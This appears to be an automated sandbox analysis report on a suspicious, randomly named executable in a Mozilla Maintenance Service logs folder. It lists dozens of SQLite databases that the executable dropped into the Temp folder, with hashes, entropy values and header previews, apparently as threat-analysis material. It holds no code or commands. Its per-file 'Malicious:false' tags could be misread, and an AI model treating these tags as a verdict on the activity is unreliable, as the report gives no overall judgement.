                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\BCw6UEphel

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\BIx1UwX2oY

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\BeKGhaL4qg

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\D0zORJ3BNi

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\D3mg9YhQBx

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\DA5XXcjHZb

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\DBLCMu5ixT

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\DClVP9CazC

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\DRJlZXuaLT

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Dr3LsNdFKZ

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\DyyI8zDYYY

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\E0mSM3We4v

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\E7xJn0xVwD

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\EGWVNxTTCi

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\EjdV0WJJNZ

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\EoXjdnWCT9

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\EpMXOGEKXK

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\EvTvIyN8PE

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\EwGH0aPVdE

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\F1FpioI7IA

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\FKXVznte3d

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\GI1QFe5QqZ

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\GuNIg8pPoG

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
